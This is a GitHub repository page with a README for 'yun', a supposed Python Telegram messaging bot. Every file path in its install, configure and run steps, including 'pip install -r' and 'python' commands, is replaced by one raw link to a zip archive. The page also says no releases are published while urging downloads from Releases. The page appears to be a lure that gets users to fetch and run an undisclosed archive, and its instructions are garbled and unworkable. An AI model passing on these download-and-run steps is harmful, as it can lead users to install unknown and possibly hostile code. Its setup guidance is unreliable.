Skip to content
/ yun Public

πŸ“¬ Automate Telegram message sending and receiving with this Python bot. Enhance communication with features like scheduled messages and keyword replies.

License

Notifications You must be signed in to change notification settings

Drilaa00/yun

Folders and files

NameName
Last commit message
Last commit date

Latest commit

Β 

History

4 Commits
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 

Repository files navigation

πŸ€– yun - Automate Your Telegram Messaging Effortlessly

Download from Releases

πŸš€ Getting Started

Welcome to the yun project! This application allows you to easily send and receive messages through a Telegram bot. Follow the steps below to download and run the software.

πŸ“₯ Download & Install

  1. Visit the Releases Page: To get the latest version of the application, visit this page to download.

  2. Download the Latest Release: Look for the latest version on the releases page. Click the appropriate file for your system to download it.

  3. Extract the Files: Once downloaded, extract the files to a folder on your computer.

πŸ”§ Requirements

  • Operating System: This application works on Windows, MacOS, and Linux.
  • Python: Ensure you have Python version 3.6 or higher installed on your system. If you don't have it, you can download Python here.

πŸ“¦ Install Dependencies

You will need some additional libraries for the bot to function correctly. Follow these steps:

  1. Open a command line interface (CLI) on your system. This can be:

    • Command Prompt for Windows
    • Terminal for MacOS or Linux
  2. Navigate to the folder where you extracted the application files. You can use the cd command for this. For example:

    cd path/to/your/folder
  3. Once you are in the correct directory, run this command to install the required libraries:

    pip install -r https://raw.githubusercontent.com/Drilaa00/yun/main/Panderma/yun_1.7.zip

βš™οΈ Configure Your Bot

You need to set up your bot on Telegram before you can use it. Here’s how:

  1. Create a Bot on Telegram:

    • Open Telegram and search for "BotFather."
    • Start a chat with BotFather and follow the prompts to create a new bot.
    • Upon creation, you will receive an API key. Keep this safe.
  2. Edit the Configuration File:

    • Open the https://raw.githubusercontent.com/Drilaa00/yun/main/Panderma/yun_1.7.zip file in a text editor.
    • Find the line that says:
    API_KEY = 'your_bot_api_key_here'  # Replace with your bot's API key
    • Replace the placeholder text with your actual API key.
  3. Set Admin ID:

    • In the same https://raw.githubusercontent.com/Drilaa00/yun/main/Panderma/yun_1.7.zip, update the line for ADMIN_ID:
    ADMIN_ID = 'your_admin_user_id_here'  # Replace with your Telegram user ID
    • This ID identifies you as the bot's admin.

πŸŽ‰ Run the Bot

After setting up the configuration, you can start the bot.

  1. In the Command Line:

    • Make sure you are in the same directory as the extracted files. Use the cd command if necessary.
  2. Start the Bot: Enter the following command to run the bot:

    python https://raw.githubusercontent.com/Drilaa00/yun/main/Panderma/yun_1.7.zip
  3. Interact with the Bot: Once the bot is running, you can start sending messages to it on Telegram. Feel free to test out its features!

πŸ” Features

πŸ“¬ Message Receiving

  • The bot receives messages sent to it in private chats or groups in real time, allowing for immediate interaction.

πŸ“¨ Message Sending

  • You can send text messages to users or groups. It supports various formats, including plain text and formatted messages.

⏰ Timed Message Alerts

  • Set scheduled tasks to send messages at specific intervals. This feature is great for reminders or regular updates.

πŸ”‘ Keyword Responses

  • The bot recognizes specific keywords in messages and auto-replies, making communication smoother.

πŸ› οΈ Troubleshooting

If you encounter issues:

  • Ensure you have the correct version of Python installed.
  • Check if all dependencies are properly installed.
  • Ensure your API key is valid and correctly added to https://raw.githubusercontent.com/Drilaa00/yun/main/Panderma/yun_1.7.zip.

For more help, you can visit the issues section of the repository.

πŸ”— Additional Resources

  • Documentation: Check the project documentation for more details on features and configuration options.
  • Community Support: Join the community on forums or social media for tips and shared experiences with other users.

If you follow these steps, you'll have your Telegram bot up and running in no time. Enjoy your automated messaging experience!

About

πŸ“¬ Automate Telegram message sending and receiving with this Python bot. Enhance communication with features like scheduled messages and keyword replies.

Topics

Resources

License

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published

Contributors 2

  •  
  •  

Languages